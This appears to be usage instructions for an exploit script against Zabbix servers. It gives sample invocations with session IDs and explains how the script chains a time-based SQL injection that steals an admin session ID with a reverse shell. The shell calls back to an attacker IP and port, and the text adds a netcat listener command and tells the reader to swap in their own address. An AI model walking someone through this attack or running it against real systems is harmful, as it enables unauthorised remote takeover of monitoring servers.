```bash
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
```
You have identified a Zabbix server running on IP `192.168.1.100`, and you have access to a low-privileged user with the following details:

- Session ID (`sid`): `d82bf6715e1d3c1f25`
- Host ID (`hostid`): `10107`
- PHP session ID (`phpsessid`): `a4g7f48d9j3r7h8s9g`

You want to exploit the RCE vulnerability using this script.
```bash
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
```

- `--ip 192.168.1.100`: The IP address of the Zabbix server.
- `--sid d82bf6715e1d3c1f25`: The session ID of a low-privileged user.
- `--hostid 10107`: The ID of a host that the low-privileged user can access.
- `--phpsessid a4g7f48d9j3r7h8s9g`: The PHP session ID used to authenticate requests.
- `--false_time 1`: Time in seconds to sleep in case of a wrong guess during the SQL injection (default is 1 second).
- `--true_time 3`: Time in seconds to sleep in case of a correct guess during the SQL injection (default is 3 seconds).
- The script will start by attempting to extract the admin session ID using a time-based SQL injection.
- Once the admin session ID is obtained, the script will create a reverse shell script on the Zabbix server.
- Finally, the script will execute the reverse shell, connecting back to your machine on the IP and port specified in the script (`10.0.46.27:5555`).
- Make sure that your machine is listening on the specified port (`5555` in the script) to catch the reverse shell. You can use netcat for this: `nc -lvnp 5555`
- Replace the IP `10.0.46.27` and port `5555` in the `CreateScript` function with your own IP and desired port to receive the reverse shell.